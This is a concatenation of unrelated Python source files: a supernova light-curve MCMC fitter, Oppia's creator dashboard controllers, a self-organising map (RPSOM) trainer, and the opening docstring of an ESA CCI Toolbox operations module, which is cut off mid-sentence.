resid = epsL(my_tfit, MNi_fit, t0_fit) - my_Lfit
chisq = np.sum((resid/my_dLfit)**2)
self.vmsg("chisq/nu = {0:.2f}/{1} = {2:.2f}".format(
chisq, self.ndof, chisq/self.ndof))
return MNi_fit, t0_fit
def fillblob(self, pars):
"""Fills a blob with everything but likelihood and prior
Since PTSampler doesn't support blobs, it makes sense for us to break
out the blob-filling capabilities so that we don't do them over and
over needlessly. In point of fact, we need to calculate most of the
blob quantities to calculate the likelihood, but there's no sense in
re-evaluating the log likelihood if all we want is the blob.
"""
# Unpack parameters from vector
MWD, MNi, v_e, kappa, q, trise, muoff, uvcor = pars
# Default blob
blob = dict(self._default_blob)
blob.update({ 'MWD': MWD, 'MNi': MNi, 'v_e': v_e, 'q': q,
'trise': trise, 'muoff': muoff, 'uvcor': uvcor,
'fail': 'default' })
# Get rid of unphysical fits with extreme prejudice
if MWD < MNi:
blob['fail'] = "badMWD"
return blob
# Fill the regular vsc for comparison with other models
vsc = np.sqrt(12)*v_e
# Calculate t0 based on v_e from Stritzinger's original expression
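# (Illustrative unit bookkeeping for the line below: MWD in solar masses is
# converted to grams via 2e33, kappa is in cm^2/g, v_e in km/s is converted to
# cm/s via 1e5, and the final /86400 converts seconds to days.)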
t0 = np.sqrt((MWD*2e+33) * kappa * q / (8*np.pi)) / (v_e*1e+5) / 86400
# Update blob with physical solution
blob.update({ 'vsc': vsc, 'v_e': v_e, 't0': t0, 'q': q, 'fail': None })
return blob
def logl(self, pars, blob=None):
"""Log likelihood *only* for PTSampler
This assumes that all the parameters lie within bounds laid out in
self._features. Implicit bounds caused by physics *necessary* for the
likelihood to make sense, e.g., binding energy, must be included here.
"""
# Fill the blob first, if necessary
if blob is None:
blob = Stritz06_MCMC.fillblob(self, pars)
if blob['fail'] is not None:
return -np.inf
MNi, trise, t0, muoff, uvcor = [blob[f] for f in
('MNi', 'trise', 't0', 'muoff', 'uvcor')]
# Model: energy deposited (effective alpha = 1)
model = MNi * Arnett82.epsilon(self.tfit + trise, t0)
# Data: include distance modulus offset, plus UV near max
data = self.Lfit * 10**(-0.4*muoff)
data[self.tfit < 10.0] *= (1 + uvcor)
# Calculate chi-square
chisq = (((model - data)/self.dLfit)**2).sum()
return self.lnPchisq(chisq, self.ndof)
def logp(self, pars, blob=None):
"""Log prior *only* for PTSampler
This assumes that all the parameters lie within bounds laid out in
self._features. Implicit bounds caused by physics assumed beyond
what's needed to calculate the likelihood, e.g., neutronization,
must be included here.
"""
# Unpack parameters from vector
MWD, MNi, v_e, kappa, q, trise, muoff, uvcor = pars
# Prior terms P(theta), some fixed in the Stritzinger+ 2006 text
chpri = ((trise - self.trise_Pmu) / self.trise_Psig)**2
chpri += ((muoff - self.muoff_Pmu) / self.muoff_Psig)**2
chpri += ((kappa - self.kappa_Pmu) / self.kappa_Psig)**2
chpri += ((v_e - self.v_e_Pmu) / self.v_e_Psig)**2
chpri += ((q - self.q_Pmu) / self.q_Psig)**2
return -0.5*chpri
def show_results(self, makeplots=True, showplots=True, plotfname=None):
"""Overload of show_results including light curve fit"""
# If we're going to save or show plots, we have to make them first
if plotfname or showplots: makeplots = True
# First show the contour plots etc.
SNMCMC.show_results(self, makeplots=makeplots, showplots=False)
if sum(self.goodidx) < 5:
self.vmsg("No good blobs, hence no results to show!")
return
# Count the super-Chandra fraction etc.
goodblobs = np.array([b for b in self.bloblist[self.goodidx]])
goodprobs = np.array([b for b in self.lnproblist[self.goodidx]])
SChidx = np.array([b['MWD'] > 1.4 for b in goodblobs])
SChblobs = goodblobs[SChidx]
SChprobs = np.exp(goodprobs[SChidx])
print " fraction of samples with MWD > 1.4: {0}".format(
len(SChblobs) / float(len(goodblobs)))
if len(SChblobs) > 0:
print " highest probability with MWD > 1.4: {0}".format(
np.max(SChprobs))
# Calculate the best-fit light curve
best_blob = goodblobs[goodprobs.argmax()]
self.best_model_t = np.arange(
-5.0, max(self.tfit[-1], self.tnfit[-1], 1.0))
self.best_model_L = best_blob['MNi'] * Arnett82.epsilon(
self.best_model_t + best_blob['trise'], best_blob['t0'])
# Then show the light curve fit in the bottommost panel
if not makeplots: return
pypl.subplot(2, 1, 2)
pypl.plot(self.best_model_t, np.log10(self.best_model_L),
color='g', ls='-')
pypl.errorbar(self.tfit, np.log10(self.Lfit),
yerr=np.log10(1.0 + self.dLfit/self.Lfit),
c='g', ls='None', marker='o')
pypl.errorbar(self.tnfit, np.log10(self.Lnfit),
yerr=np.log10(1.0 + self.dLnfit/self.Lnfit),
c='r', ls='None', marker='o')
pypl.xlabel("Days Since Bolometric Maximum Light")
pypl.ylabel("Bolometric Luminosity (erg/s)")
fig = pypl.gcf()
fig.set_size_inches(7.5, 7.5)
pypl.subplots_adjust(left=0.1, right=0.9, bottom=0.10, top=0.95,
wspace=0.30, hspace=0.25)
if plotfname:
pypl.savefig(plotfname, dpi=100)
if showplots:
pypl.show()
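# -----------------------------------------------------------------------------
# Usage sketch (illustrative only, kept commented out): how one might drive
# this fitter on a made-up bolometric light curve. It assumes the SNMCMC base
# class provides a run()-style driver that fills self.bloblist/self.lnproblist;
# the actual entry point may be named differently.
#
# import numpy as np
# t = np.array([0.0, 40.0, 60.0, 80.0]) # days since bolometric maximum
# L = np.array([1.2e43, 2.5e42, 1.1e42, 6.0e41]) # erg/s
# dL = 0.1*L # 10% uncertainties
# fitter = Stritz06_MCMC(t, L, dL, sn_name="SN XXXXxx", trise=18.0)
# fitter.run() # hypothetical driver inherited from SNMCMC
# fitter.show_results(plotfname="stritz06_fit.png")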
|
|
# Copyright 2014 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Controllers for the creator dashboard, notifications, and creating new
activities.
"""
from __future__ import annotations
import logging
from core import feconf
from core import utils
from core.constants import constants
from core.controllers import acl_decorators
from core.controllers import base
from core.domain import collection_domain
from core.domain import collection_services
from core.domain import exp_domain
from core.domain import exp_fetchers
from core.domain import exp_services
from core.domain import feedback_services
from core.domain import role_services
from core.domain import subscription_services
from core.domain import suggestion_services
from core.domain import summary_services
from core.domain import topic_fetchers
from core.domain import user_services
EXPLORATION_ID_KEY = 'exploration_id'
COLLECTION_ID_KEY = 'collection_id'
class OldContributorDashboardRedirectPage(base.BaseHandler):
"""Redirects the old contributor dashboard URL to the new one."""
URL_PATH_ARGS_SCHEMAS = {}
HANDLER_ARGS_SCHEMAS = {'GET': {}}
@acl_decorators.open_access
def get(self):
"""Handles GET requests."""
self.redirect('/contributor-dashboard', permanent=True)
class OldCreatorDashboardRedirectPage(base.BaseHandler):
"""Redirects the old creator dashboard URL to the new one."""
URL_PATH_ARGS_SCHEMAS = {}
HANDLER_ARGS_SCHEMAS = {'GET': {}}
@acl_decorators.open_access
def get(self):
"""Handles GET requests."""
self.redirect(feconf.CREATOR_DASHBOARD_URL, permanent=True)
class CreatorDashboardPage(base.BaseHandler):
"""Page showing the user's creator dashboard."""
ADDITIONAL_DEPENDENCY_IDS = ['codemirror']
URL_PATH_ARGS_SCHEMAS = {}
HANDLER_ARGS_SCHEMAS = {'GET': {}}
@acl_decorators.can_access_creator_dashboard
def get(self):
self.render_template('creator-dashboard-page.mainpage.html')
class CreatorDashboardHandler(base.BaseHandler):
"""Provides data for the user's creator dashboard page."""
GET_HANDLER_ERROR_RETURN_TYPE = feconf.HANDLER_TYPE_JSON
URL_PATH_ARGS_SCHEMAS = {}
HANDLER_ARGS_SCHEMAS = {
'GET': {},
'POST': {
'display_preference': {
'schema': {
'type': 'basestring',
'choices': (
constants.ALLOWED_CREATOR_DASHBOARD_DISPLAY_PREFS
.values()
)
}
}
}
}
@acl_decorators.can_access_creator_dashboard
def get(self):
"""Handles GET requests."""
def _round_average_ratings(rating):
"""Returns the rounded average rating to display on the creator
dashboard.
Args:
rating: float. The rating of the lesson.
Returns:
float. The rounded average value of rating.
"""
return round(
rating, feconf.AVERAGE_RATINGS_DASHBOARD_PRECISION)
subscribed_exploration_summaries = (
exp_fetchers.get_exploration_summaries_subscribed_to(
self.user_id))
subscribed_collection_summaries = (
collection_services.get_collection_summaries_subscribed_to(
self.user_id))
exploration_ids_subscribed_to = [
summary.id for summary in subscribed_exploration_summaries]
exp_summary_dicts = summary_services.get_displayable_exp_summary_dicts(
subscribed_exploration_summaries)
collection_summary_dicts = []
feedback_thread_analytics = (
feedback_services.get_thread_analytics_multi(
exploration_ids_subscribed_to))
# TODO(bhenning): Update this to use unresolved answers from
# stats_services once the training interface is enabled and it's cheaper
# to retrieve top answers from stats_services.
for ind, exploration in enumerate(exp_summary_dicts):
exploration.update(feedback_thread_analytics[ind].to_dict())
exp_summary_dicts = sorted(
exp_summary_dicts,
key=lambda x: (x['num_open_threads'], x['last_updated_msec']),
reverse=True)
topic_summaries = topic_fetchers.get_all_topic_summaries()
topic_summary_dicts = [
summary.to_dict() for summary in topic_summaries]
if role_services.ACTION_CREATE_COLLECTION in self.user.actions:
for collection_summary in subscribed_collection_summaries:
# TODO(sll): Reuse _get_displayable_collection_summary_dicts()
# in summary_services, instead of replicating it like this.
collection_summary_dicts.append({
'id': collection_summary.id,
'title': collection_summary.title,
'category': collection_summary.category,
'objective': collection_summary.objective,
'language_code': collection_summary.language_code,
'last_updated_msec': utils.get_time_in_millisecs(
collection_summary.collection_model_last_updated),
'created_on': utils.get_time_in_millisecs(
collection_summary.collection_model_created_on),
'status': collection_summary.status,
'node_count': collection_summary.node_count,
'community_owned': collection_summary.community_owned,
'thumbnail_icon_url': (
utils.get_thumbnail_icon_url_for_category(
collection_summary.category)),
'thumbnail_bg_color': utils.get_hex_color_for_category(
collection_summary.category),
})
dashboard_stats = user_services.get_dashboard_stats(self.user_id)
dashboard_stats.update({
'total_open_feedback': feedback_services.get_total_open_threads(
feedback_thread_analytics)
})
if dashboard_stats and dashboard_stats.get('average_ratings'):
dashboard_stats['average_ratings'] = (
_round_average_ratings(dashboard_stats['average_ratings']))
last_week_stats = (
user_services.get_last_week_dashboard_stats(self.user_id))
if last_week_stats and len(list(last_week_stats.keys())) != 1:
logging.exception(
'\'last_week_stats\' should contain only one key-value pair'
' denoting last week dashboard stats of the user keyed by a'
' datetime string.')
last_week_stats = None
if last_week_stats:
# 'last_week_stats' is a dict with only one key-value pair denoting
# last week dashboard stats of the user keyed by a datetime string.
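# For example (illustrative values only):
# {'2014-06-01': {'average_ratings': 4.2, ...}}.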
datetime_of_stats = list(last_week_stats.keys())[0]
last_week_stats_average_ratings = (
list(last_week_stats.values())[0].get('average_ratings'))
if last_week_stats_average_ratings:
last_week_stats[datetime_of_stats]['average_ratings'] = (
_round_average_ratings(last_week_stats_average_ratings))
subscriber_ids = subscription_services.get_all_subscribers_of_creator(
self.user_id)
subscribers_settings = user_services.get_users_settings(subscriber_ids)
subscribers_list = []
for index, subscriber_settings in enumerate(subscribers_settings):
subscriber_summary = {
'subscriber_picture_data_url': (
subscriber_settings.profile_picture_data_url),
'subscriber_username': subscriber_settings.username,
'subscriber_impact': (
user_services.get_user_impact_score(subscriber_ids[index]))
}
subscribers_list.append(subscriber_summary)
user_settings = user_services.get_user_settings(
self.user_id, strict=False)
creator_dashboard_display_pref = (
user_settings.creator_dashboard_display_pref)
suggestions_created_by_user = suggestion_services.query_suggestions(
[('author_id', self.user_id),
(
'suggestion_type',
feconf.SUGGESTION_TYPE_EDIT_STATE_CONTENT)])
suggestions_which_can_be_reviewed = (
suggestion_services
.get_all_suggestions_that_can_be_reviewed_by_user(self.user_id))
for s in suggestions_created_by_user:
s.populate_old_value_of_change()
for s in suggestions_which_can_be_reviewed:
s.populate_old_value_of_change()
suggestion_dicts_created_by_user = (
[s.to_dict() for s in suggestions_created_by_user])
suggestion_dicts_which_can_be_reviewed = (
[s.to_dict() for s in suggestions_which_can_be_reviewed])
ids_of_suggestions_created_by_user = (
[s['suggestion_id'] for s in suggestion_dicts_created_by_user])
ids_of_suggestions_which_can_be_reviewed = (
[s['suggestion_id']
for s in suggestion_dicts_which_can_be_reviewed])
threads_linked_to_suggestions_by_user = (
[t.to_dict() for t in feedback_services.get_multiple_threads(
ids_of_suggestions_created_by_user)])
threads_linked_to_suggestions_which_can_be_reviewed = (
[t.to_dict() for t in feedback_services.get_multiple_threads(
ids_of_suggestions_which_can_be_reviewed)])
self.values.update({
'explorations_list': exp_summary_dicts,
'collections_list': collection_summary_dicts,
'dashboard_stats': dashboard_stats,
'last_week_stats': last_week_stats,
'subscribers_list': subscribers_list,
'display_preference': creator_dashboard_display_pref,
'threads_for_created_suggestions_list': (
threads_linked_to_suggestions_by_user),
'threads_for_suggestions_to_review_list': (
threads_linked_to_suggestions_which_can_be_reviewed),
'created_suggestions_list': suggestion_dicts_created_by_user,
'suggestions_to_review_list': (
suggestion_dicts_which_can_be_reviewed),
'topic_summary_dicts': topic_summary_dicts
})
self.render_json(self.values)
@acl_decorators.can_access_creator_dashboard
def post(self):
creator_dashboard_display_pref = (
self.normalized_payload.get('display_preference'))
user_services.update_user_creator_dashboard_display(
self.user_id, creator_dashboard_display_pref)
self.render_json({})
class NewExplorationHandler(base.BaseHandler):
"""Creates a new exploration."""
URL_PATH_ARGS_SCHEMAS = {}
HANDLER_ARGS_SCHEMAS = {
'POST': {
'title': {
'schema': {
'type': 'basestring'
},
'default_value': feconf.DEFAULT_EXPLORATION_TITLE
}
}
}
@acl_decorators.can_create_exploration
def post(self):
"""Handles POST requests."""
title = self.normalized_payload.get('title')
new_exploration_id = exp_fetchers.get_new_exploration_id()
exploration = exp_domain.Exploration.create_default_exploration(
new_exploration_id, title=title)
exp_services.save_new_exploration(self.user_id, exploration)
self.render_json({
EXPLORATION_ID_KEY: new_exploration_id
})
class NewCollectionHandler(base.BaseHandler):
"""Creates a new collection."""
URL_PATH_ARGS_SCHEMAS = {}
HANDLER_ARGS_SCHEMAS = {
'POST': {}
}
@acl_decorators.can_create_collection
def post(self):
"""Handles POST requests."""
new_collection_id = collection_services.get_new_collection_id()
collection = collection_domain.Collection.create_default_collection(
new_collection_id)
collection_services.save_new_collection(self.user_id, collection)
self.render_json({
COLLECTION_ID_KEY: new_collection_id
})
class UploadExplorationHandler(base.BaseHandler):
"""Uploads a new exploration."""
URL_PATH_ARGS_SCHEMAS = {}
HANDLER_ARGS_SCHEMAS = {
'POST': {
'yaml_file': {
'schema': {
'type': 'basestring'
},
'default_value': None
}
}
}
@acl_decorators.can_upload_exploration
def post(self):
"""Handles POST requests."""
yaml_content = self.normalized_request.get('yaml_file')
new_exploration_id = exp_fetchers.get_new_exploration_id()
if constants.ALLOW_YAML_FILE_UPLOAD:
exp_services.save_new_exploration_from_yaml_and_assets(
self.user_id, yaml_content, new_exploration_id, [],
strip_voiceovers=True)
self.render_json({
EXPLORATION_ID_KEY: new_exploration_id
})
else:
raise self.InvalidInputException(
'This server does not allow file uploads.')
|
|
#!/usr/local/bin/python
# -*- coding: utf-8 -*-
from SOM.Model import SOM, run
from SOM import logger
from SOM import Map
from SOM import Coefficients as coef
from map_eval import map_eval
import RPSOM_config
import numpy as np
import copy
class RPSOM:
def __init__ (self, epochs=10
, map_size_x=10, map_size_y=10
, input_num =16, input_size=16
, class_names=None, feature_names=None
, input_file=None
, weight=None
, alpha_max=[0.1, 0.3, 0.5]
, alpha_min=[0.01, 0.05, 0.1]
, sigma_max=[5, 7, 10]
, sigma_min=[1, 3, 5]
, unit_shape = "Square"
, log_file = None
, config_dict = None
):
self.config = {}
self.map_size_y = map_size_y
self.map_size_x = map_size_x
self.input_num = input_num
self.input_size = input_size
len_amax = len(alpha_max)
len_amin = len(alpha_min)
len_smax = len(sigma_max)
len_smin = len(sigma_min)
if len_amax != len_amin:
print "mismatch the alpha size: alpha_max=%d, alpha_min=%d" % (len_amax, len_amin)
quit()
if len_smax != len_smin:
print "mismatch the sigma size: sigma_max=%d, sigma_min=%d" % (len_smax, len_smin)
quit()
self.alpha_max = alpha_max
self.alpha_min = alpha_min
self.sigma_max = sigma_max
self.sigma_min = sigma_min
self.ways = len_amax * len_smax
self.epochs = epochs
self.som_class = np.zeros((map_size_y, map_size_x), dtype=int)
self.d_indx = []
if class_names is None:
self.class_names = None
else :
self.class_names = class_names
if feature_names is None:
self.feature_names = None
else :
self.feature_names = feature_names
if config_dict:
RPSOM_config.set_rpsom_params (self, config_dict)
if input_file is None:
self.input_x = np.zeros((input_num, input_size))
else :
import pandas
data = pandas.read_csv (input_file, index_col="label")
tmp = data.as_matrix()
self.input_x = tmp[:,:]
self.input_num = len(self.input_x)
self.input_size = len(self.input_x[0])
self.feature_names = list(data.columns)
self.class_names = list(data.index)
input_file = None
if log_file:
self.log_fp=open(log_file, "w")
else :
self.log_fp=None
self.som = []
for i in range(len_amax):
for j in range(len_smax):
self.som.append ( SOM ( epochs=self.epochs
, map_size_y=self.map_size_y, map_size_x=self.map_size_x
, input_num=self.input_num, input_size=self.input_size
, class_names=self.class_names
, feature_names=self.feature_names
, input_file=input_file
, weight=weight
, alpha_max=alpha_max[i], alpha_min=alpha_min[i]
, sigma_max=sigma_max[j], sigma_min=sigma_min[j]
, unit_shape = unit_shape
, log_fp = self.log_fp
)
)
RPSOM_config.conf2dict(self)
def set_config (self, params_dict=None):
RPSOM_config.set_rpsom_params (self, params_dict)
self.recreate ()
def recreate (self):
self.som_class = np.zeros((self.map_size_y, self.map_size_x), dtype=int)
self.input_x = np.zeros((self.input_num, self.input_size))
self.som = []
for i in range(len(self.alpha_max)):
for j in range(len(self.sigma_max)):
self.som.append ( SOM ( epochs=self.epochs
, map_size_y=self.map_size_y, map_size_x=self.map_size_x
, input_num=self.input_num, input_size=self.input_size
, class_names=self.class_names
, feature_names=self.feature_names
, input_file=None
, alpha_max=self.alpha_max[i], alpha_min=self.alpha_min[i]
, sigma_max=self.sigma_max[j], sigma_min=self.sigma_min[j]
)
)
def load_input_csv (self, csv):
import pandas
data = pandas.read_csv (csv, index_col='label')
tmp = data.as_matrix()
self.input_x = tmp[:,:]
shape = self.input_x.shape
if self.input_num != shape[0]:
print "The number of input data sets dose not match the initial state."
exit()
if self.input_size != shape[1]:
print "The feature size of input data dose not match the initial state."
exit()
self.class_names = list(data.index)
self.feature_names = list(data.columns)
def weights_output_csv (self, csv):
filename=csv
import pandas
for i, som in enumerate(self.som):
filename = "%s_%d.csv" % (csv, i)
new_array = np.reshape(som.weights, (self.map_size_x*self.map_size_y, self.input_size))
df = pandas.DataFrame (new_array)
df.columns = self.feature_names
df.to_csv (filename)
def weight_output_csv (self, csv):
self.som[0].weight_output_csv(csv)
def weights_load_csv (self, csv):
filename = csv
import pandas
for i, som in enumerate(self.som):
filename = "%s_%d.csv" % (csv, i)
data = pandas.read_csv(filename, index_col=0)
tmp = data.as_matrix()
som.weights = np.reshape(tmp, (self.map_size_y, self.map_size_x, self.input_size))
def weight_load_csv (self, csv):
for som in self.som:
som.weight_load_csv (csv)
def to_json (self, filename):
import json
fp = open (filename, "w")
json.dump (self.config, fp)
fp.close()
def from_json (self, filename):
import json
fp = open (filename, "r")
self.config = json.load(fp)
fp.close()
RPSOM_config.dict2config(self)
self.recreate ()
def fit (self, trainX, epochs=10, verbose=0, topology="gaussian"
, callbacks=None, shuffle=True, interval=1
, alpha_func=coef.RP_alpha_func, sigma_func=coef.RP_sigma_func
, unrelated_columns=None):
if interval<=0:
print "Please set an interval with a positive integer."
return
if shuffle :
_index = np.random.permutation(self.input_num)
self.input_x = trainX[_index]
_names = np.array(self.class_names)
self.class_names = list(_names[_index])
for som in self.som:
som.input_x = self.input_x
som.class_names = self.class_names
else :
self.input_x = trainX
for som in self.som:
som.input_x=trainX
if callbacks is None:
cb_fg = 0
else :
cb_fg = 1
tmp_inputx = self.input_x
colid =[]
if unrelated_columns is not None:
for uncols in unrelated_columns:
if type(uncols) is int:
colid.append(uncols)
else :
colid.append(self.feature_names.index(uncols))
tmp_inputx = np.delete (tmp_inputx, colid, 1)
self.alpha_tbl = alpha_func(alpha_max=self.alpha_max, alpha_min=self.alpha_min, epochs=epochs)
self.sigma_tbl = sigma_func(sigma_max=self.sigma_max, sigma_min=self.sigma_min, epochs=epochs)
len_sig = len(self.sigma_max)
len_alp = len(self.alpha_max)
for epoch in range(epochs):
for i in range(len_alp):
for j in range(len_sig):
tmp_weights = self.som[i*len_sig+j].weights
tmp_weights = np.delete (tmp_weights, colid, 2)
self.som[i*len_sig+j].search_BMU(inputx=tmp_inputx, weights=tmp_weights)
if cb_fg == 1:
self.som[i*len_sig+j].write_BMU()
if self.log_fp:
self.som[i*len_sig+j].fwrite_BMU()
self.som[i*len_sig+j].modify(epoch=epoch, epochs=epochs, verbose=verbose, topology=topology, alpha=self.alpha_tbl[i], sigma=self.sigma_tbl[j], log_fp=self.log_fp)
self.som[i*len_sig+j].som_mapping(epoch=epoch, inputx=self.input_x, weights=self.som[i*len_sig+j].weights)
if epoch % interval == 0:
Dif, Fit, total = map_eval(self)
min_index = total.index(min(total))
self.d_indx.append(min_index)
if verbose != 0:
print "min.evaluation: id: %d dif: %f fit: %f sum: %f\n" % (min_index, Dif[min_index], Fit[min_index], total[min_index])
if self.log_fp:
self.log_fp.write("min.evaluation: id %d dif: %f fit: %f sum: %f\n\n" % (min_index, Dif[min_index], Fit[min_index], total[min_index]))
for i, som in enumerate(self.som):
if i != min_index:
som.weights[:,:,:] = self.som[min_index].weights[:,:,:]
som.mapping[:,:] = self.som[min_index].mapping[:,:]
print "best matching map: %d" % min_index
if self.log_fp:
self.log_fp.write("Best matching Map: No. %d\n" % min_index)
self.log_fp.close()
def maps_output2wrl_squ (self, grad, func=Map.thick_func_weights, drawable="weights", filename=None):
for i, som in enumerate(self.som):
som.map_output2wrl_squ (grad=100, index=i, filename=filename)
def map_output2wrl_squ (self, grad, func=Map.thick_func_weights, drawable="weights", index="", filename=None):
Map.output_rgb_wrl_squ (self.som[0], grad, func=func, drawable=drawable, index=index, filename=filename)
def maps_output2wrl_gray_squ (self, filename):
for i, som in enumerate(self.som):
fname = "%s_%d" %(filename, i)
som.map_output2wrl_gray_squ (fname)
def map_output2wrl_gray_squ (self, filename):
Map.output_gray_wrl_squ (self.som[0], filename=filename)
def map_output2wrl_gray_hex (self, filename):
Map.output_gray_wrl_hex (self.som[0], filename=filename)
def trans_graph (rpsom, filename="trans_graph.png"):
ay=[]
sy=[]
x = np.arange(0, rpsom.epochs)
for epoch in range(rpsom.epochs):
ay.append(rpsom.alpha_tbl[rpsom.d_indx[epoch]/len(rpsom.sigma_max)][epoch])
sy.append(rpsom.sigma_tbl[rpsom.d_indx[epoch]%len(rpsom.sigma_max)][epoch])
from matplotlib import pyplot as plt
fig, ax1 = plt.subplots()
ax2 = ax1.twinx()
lns3 = ax2.plot(x, rpsom.d_indx, 'g', label="np")
lns1 = ax1.plot(x, ay, 'b', label="alpha")
lns2 = ax2.plot(x, sy, 'r', label="sigma")
lns = lns1+lns2+lns3
labs = [l.get_label() for l in lns]
ax1.legend(lns, labs,loc=0)
ax1.set_ylabel('alpha')
ax2.set_ylabel('sigma')
ax1.set_xlabel('epoch')
ax1.set_ylim(ymin=0, ymax=1)
ymax = np.max(rpsom.sigma_tbl)
ax2.set_ylim(ymin=0, ymax=ymax)
plt.savefig(filename)
@logger.time_rap
def run ( input_file=None, input_x=None
, epochs=100, map_size_x=20, map_size_y=20
, input_num=16, input_size=16
, class_name=None, feature_names=None
, drawable="weights", func=Map.thick_func_weights
, grad=100, verbose=1, interval=1
, alpha_max=[0.1, 0.3, 0.5]
, alpha_min=[0.01, 0.05, 0.1]
, sigma_max=[5, 7, 10]
, sigma_min=[1, 3, 5]
, topology="gaussian"
, callbacks=None, shuffle=True
, output_file="output_map"
, unrelated_columns = None
):
if input_x is None and input_file is None:
print "Input vector is not set."
quit()
else :
rpsom=RPSOM( epochs=epochs
, map_size_x=map_size_x, map_size_y=map_size_y
, input_num=input_num, input_size=input_size
, class_names=class_name, feature_names=feature_names
, input_file=input_file
, alpha_max=alpha_max, alpha_min=alpha_min
, sigma_max=sigma_max, sigma_min=sigma_min
)
if input_x is not None:
rpsom.input_x = input_x
if drawable in ("indexes", "Indexes", "INDEXES", "index", "Index"):
grad = rpsom.input_num
rpsom.fit ( trainX=rpsom.input_x, epochs=epochs, verbose=verbose
, topology=topology, callbacks=callbacks, shuffle=shuffle
, interval=interval
, alpha_func=coef.RP_alpha_func, sigma_func=coef.RP_sigma_func
, unrelated_columns = unrelated_columns)
for som in rpsom.som:
som.som_mapping(epoch=epochs-1, inputx=rpsom.input_x, weights=som.weights)
for i, som in enumerate(rpsom.som):
Map.output_rgb_wrl_squ(som=som, grad=grad, func=func, drawable=drawable, filename=output_file, index=i)
output_file = "output_map_" + str(i)
Map.output_gray_wrl_squ(som=som, filename=output_file)
def classifier (rpsom, verbose=0, topology="gaussian", callbacks=None, shuffle=False, interval=1, alpha_func=coef.RP_alpha_func, sigma_func=coef.RP_sigma_func):
rpsom.fit( rpsom.input_x, epochs=rpsom.epochs, verbose=verbose
, topology=topology, callbacks=callbacks, shuffle=shuffle
, interval=interval
, alpha_func=alpha_func, sigma_func=sigma_func
)
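# -----------------------------------------------------------------------------
# Usage sketch (illustrative only, kept commented out): training an RPSOM on a
# small random data set. The sizes and file names are made up; it assumes the
# SOM backend modules imported above are available.
#
# import numpy as np
# data = np.random.rand(16, 16) # 16 samples with 16 features each
# rpsom = RPSOM(epochs=50, map_size_x=10, map_size_y=10,
#               input_num=16, input_size=16)
# rpsom.fit(trainX=data, epochs=50, verbose=1, shuffle=False)
# rpsom.weights_output_csv("trained_weights") # one CSV per member SOM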
|
|
# The MIT License (MIT)
# Copyright (c) 2016, 2017 by the ESA CCI Toolbox development team and contributors
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal in
# the Software without restriction, including without limitation the rights to
# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies
# of the Software, and to permit persons to whom the Software is furnished to do
# so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
"""
Description
===========
This modules provides classes and functions allowing to maintain *operations*. Operations can be called from
the Cate command-line interface, may be referenced from within processing workflows, or may be called remotely
e.g. from graphical user interface or web frontend. An operation (:py:class:`Operation`) comprises a Python callable
and some additional meta-information (:py:class:`OpMetaInfo`) that allows for automatic input validation,
input value conversion, monitoring, and inter-connection of multiple operations using processing workflows and steps.
Operations are registered in operation registries (:py:class:`OpRegistry`), the default operation registry is
accessible via the global, read-only ``OP_REGISTRY`` variable.
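For illustration, a minimal sketch (using made-up names and values) of how an operation may be defined
with the decorators described below and then invoked like a plain function::

    @op(version='1.0')
    @op_input('factor', data_type=float, default_value=2.0)
    @op_return(data_type=float)
    def scale(value: float, factor: float = 2.0) -> float:
        # multiply *value* by *factor*
        return value * factor

    result = scale(3.0, factor=1.5)  # 'scale' is now an Operation; result == 4.5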
Technical Requirements
======================
**Operation registration, lookup, and invocation**
:Description: Maintain a central place in the software that manages the available operations such as data processors,
data converters, analysis functions, etc. Operations can be added, removed and retrieved.
Operations are designed to be executed by the framework in a controlled way, i.e. an operation's task
can be monitored and cancelled, and its input and output values can be validated w.r.t. the operation's meta-information.
:URD-Sources:
* CCIT-UR-CR0001: Extensibility.
* CCIT-UR-E0002: dynamic extension of all modules at runtime, c) The Logic Module to introduce new processors
* CCIT-UR-LM0001: processor management allowing easy selection of tools and functionalities
----
**Exploit Python language features**
:Description: Exploit Python language to let API users express an operation in an intuitive form. For the framework API,
stay with Python base types as far as possible instead of introducing a number of new data structures.
Let the framework derive meta information such as names, types and documentation for the operation, its inputs,
and its outputs from the user's Python code.
It shall be possible to register any Python-callable of the form ``f(*args, **kwargs)`` as an operation.
----
**Add extra meta-information to operations**
:Description: Initial operation meta-information will be derived from Python code introspection. It shall include
the user function's docstring and information about its arguments and return values, exploiting any
type annotations.
For example, the following properties can be associated with input arguments: data type, default value, value set,
valid range, if it is mandatory or optional, expected dataset schema so that operations can be ECV-specific.
Meta-information is required to let an operation explain itself when used in an (IPython)
REPL or when a web service is requested to respond with an operation's capabilities.
API users shall be able to extend the initial meta-information derived from Python code.
:URD-Source:
* CCIT-UR-LM0006: offer default values for lower level users as well as selectable options for higher level users.
* CCIT-UR-LM0002: accommodating ECV-specific processors in cases where the processing is specific to an ECV.
----
**Static annotation vs. dynamic, programmatic registration**
:Description: Operation registration and meta-information extension shall also be done by operation class /
function *decorators*. The API shall provide a simple set of dedicated decorators that API users attach to their
operations. They will automatically register the user function as operation and add any extra meta-information.
----
**Operation monitoring**
:Description: Operation registration should recognise an optional *monitor* argument of a user function:
``f(*args, monitor=Monitor.NONE, **kwargs)``. In this case a monitor (of type :py:class:`Monitor`)
will be passed by the framework to the user function in order to observe the progress and to cancel an operation.
----
Verification
============
The module's unit-tests are located in
